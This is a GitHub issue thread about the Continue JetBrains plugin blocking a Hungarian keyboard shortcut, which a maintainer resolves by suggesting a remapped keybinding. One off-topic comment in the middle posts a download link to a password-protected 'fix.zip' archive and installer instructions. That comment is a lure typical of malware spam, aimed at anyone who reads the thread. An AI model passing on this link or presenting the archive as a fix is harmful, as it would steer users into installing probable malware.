### ISSUE TITLE
JetBrains plugin: Problem with Hungarian keyboard layout

### ISSUE THREAD

**Issue by thomastrinn** [continuedev/continue#2118]
### Before submitting your bug report

- [x] I believe this is a bug. I'll try to join the [Continue Discord](https://discord.gg/NWtdYexhMs) for questions
- [X] I'm not able to find an [open issue](https://github.com/continuedev/continue/issues?q=is%3Aopen+is%3Aissue) that reports the same bug
- [X] I've seen the [troubleshooting guide](https://docs.continue.dev/troubleshooting) on the Continue Docs

### Relevant environment info

```Markdown
- OS: macos 14.6.1
- Continue: 0.0.62
- IDE: JetBrains IntelliJ
```

### Description

My keyboard layout in Hungarian and the keyboard shortcut for getting the character `<` is `OPTION` + `SHIFT` + `Y`. When I have the Continue plugin enabled it does not work, when disabling it it works az expected. 
I could not find any problems in the ~/.continue/core.log.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sestinj** [comment]
@thomastrinn the best solution here might be to re-map Continue's shortcut to another keybinding. You can do this here: https://www.jetbrains.com/help/idea/configuring-keyboard-and-mouse-shortcuts.html

**Comment by thomastrinn** [comment]
Thank you for your help, I could find it, OPTION + Y was taken by Continue plugin.
